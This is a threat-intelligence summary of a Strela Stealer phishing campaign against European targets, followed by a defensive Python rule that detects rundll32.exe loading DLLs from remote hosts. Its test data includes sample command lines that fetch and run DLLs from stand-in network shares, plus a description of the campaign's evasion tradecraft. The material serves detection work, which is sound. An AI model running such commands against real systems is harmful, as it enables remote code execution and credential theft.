Summary: In November 2024, IBM X-Force observed an ongoing Hive0145 campaign targeting Europe, specifically Spain, Germany, and Ukraine, using Strela Stealer malware, a credential-theft tool delivered through highly tailored phishing emails. These emails, posing as legitimate invoice notifications, utilize previously compromised email credentials to blend seamlessly into legitimate email traffic. Strela Stealer specifically extracts credential data from Microsoft Outlook and Mozilla Thunderbird, significantly heightening the risk of business email compromise (BEC) and lateral movement within victim networks. In mid-2024, Hive0145 shifted to an attachment hijacking technique, embedding a malicious payload in stolen emails from industries such as finance, tech, and manufacturing. Unlike standard thread hijacking, Hive0145’s approach preserves the original email body and only modifies the attachment, using the same filename but with a malicious payload. This tactic is automated, leveraging harvested emails and compromised credentials to distribute malware on a large scale.
Security Officer Comments: The campaigns employ advanced obfuscation techniques, including polyglots, signed binaries, and uncommon file extensions to evade signature-based detection. The malware is delivered through Stellar Loader, a heavily obfuscated crypter that deploys Strela Stealer, executes process injection, and retrieves system and application data for exfiltration. Strela Stealer’s recent updates implement keyboard layout checks, now targeting Ukrainian speakers, and use error messages that blend with legitimate system alerts, minimizing user suspicion.
Suggested Corrections: X-Force recommends organizations:
- Exercise caution with emails and ZIP archive attachments
- Consider changing the default application for JavaScript/JScript/VBScript files to Notepad
- Monitor rundll32.exe processes executing remotely hosted DLLs
- Install and configure endpoint security software
- Update relevant network security monitoring rules
- Educate staff on the potential threats to the organization
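The third recommendation above (monitor rundll32.exe executing remotely hosted DLLs) can be turned into a simple detection rule over process-creation telemetry. The following is an added example written for this summary; it is not code from IBM X-Force or from the linked report. It assumes process-creation events have already been collected (for example Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled) and normalized into records with an image path and a command line; the event records below are constructed samples using documentation IP ranges, not real telemetry. The rule flags rundll32.exe whenever the module argument is a UNC path, a WebDAV-style UNC path (the `@SSL` / `DavWWWRoot` forms), or a URL.

```python
import re

# Constructed sample process-creation events (shape is an assumption made for
# this example: one dict per event with the process image and its command line).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\198.51.100.23\share\invoice.dll,Entry"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\203.0.113.7@SSL\DavWWWRoot\docs\inv.dll,#1"},
    # Benign: a local system DLL, the normal way rundll32 is used.
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    # Local user-writable path: suspicious in its own right, but out of scope
    # for this rule, which only covers remotely hosted modules.
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\report.dll",Run'},
    # Different image: a remote script, not rundll32, so not this rule's concern.
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\198.51.100.23\share\invoice.js"},
]

UNC_RE = re.compile(r"^\\\\[^\\]+\\")                     # \\host\share\...
WEBDAV_RE = re.compile(r"(@SSL|@\d+|DavWWWRoot)", re.I)   # WebDAV redirector forms
URL_RE = re.compile(r"^https?://", re.I)


def dll_argument(cmdline):
    """Return the module path rundll32 was given (the part before ',EntryPoint').

    Handles both a bare path and a double-quoted path. Returns None when the
    command line carries no module argument at all.
    """
    # Drop the image token itself, which may or may not be quoted.
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s+(.*)$', cmdline)
    if not m:
        return None
    rest = m.group(1).lstrip()
    if rest.startswith('"'):
        end = rest.find('"', 1)
        return rest[1:end] if end > 0 else None
    # Unquoted: the module ends at the first comma or whitespace.
    return re.split(r"[,\s]", rest, maxsplit=1)[0]


def remote_dll_indicator(dll_path):
    """Classify a module path as 'url', 'webdav-unc', 'unc', or None if local."""
    if URL_RE.search(dll_path):
        return "url"
    if UNC_RE.search(dll_path):
        return "webdav-unc" if WEBDAV_RE.search(dll_path) else "unc"
    return None


def detect_remote_rundll32(events):
    """Return one hit per rundll32.exe event whose module is remotely hosted."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith(r"\rundll32.exe"):
            continue
        module = dll_argument(ev["cmdline"])
        if not module:
            continue
        kind = remote_dll_indicator(module)
        if kind:
            hits.append({"cmdline": ev["cmdline"], "module": module, "indicator": kind})
    return hits


if __name__ == "__main__":
    for hit in detect_remote_rundll32(SAMPLE_EVENTS):
        print(f"[{hit['indicator']}] {hit['module']}  <-  {hit['cmdline']}")
```

Run against the constructed events, the rule fires twice (the plain UNC path and the WebDAV-style path) and stays silent on the local system DLL, the local user-profile DLL, and the wscript.exe event. In production the same logic would be expressed as a SIEM or EDR query over the command-line field; rundll32.exe loading a module from a UNC path is rare in normal administration, but management tooling that runs DLLs from a file share can trigger it, so tune the rule by known-good share names before alerting on it.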
Link(s): https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/